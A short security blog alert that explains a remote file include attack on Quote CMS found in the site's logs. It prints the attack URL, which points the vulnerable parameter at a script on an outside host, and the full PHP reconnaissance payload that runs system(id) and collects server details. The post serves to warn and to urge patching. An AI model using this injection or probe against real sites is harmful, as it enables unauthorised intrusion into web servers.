SecGeeks Alert : Beware of Dangorus Remote File Include Vulnerabilities,Upgrade your webapplications now!!

On this weekend,i was free and checking some logs of secgeeks and i found this:
http://www.secgeeks.com/admin/includes/themes/default/header.php?page_area=http://www..se/modules/mod_cblogin/id.txt

so what is this?first of all lets take a look at the url requested on secgeeks site.it is:
http://www.secgeeks.com/admin/includes/themes/default/header.php?page_area=

this is a remote file include vulnerability in Quote CMS.
http://secunia.com/advisories/30377
the thing is you can include any file in the vulenrable installation.in this case the file included was:
http://www..se/modules/mod_cblogin/id.txt

so what does this file do?on visiting the URL here is the file:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo " was here ..";
echo "uname -a: $un";
echo "os: $os";
echo "id: $id1";
echo "free: $free";
echo "used: $used";
echo "total: $all";
exit;

it is clear that it get current working directory,freediskspace and other details and print them.in some cases i have seen this details will be mailed to someone.
So please check you system and patch/update if necessary.its not related to one CMS from my log i can say its definatly case of some automated bot.which check for different CMS file include vulnerability.

Stay aware,Stay Secure.....
-SecGeek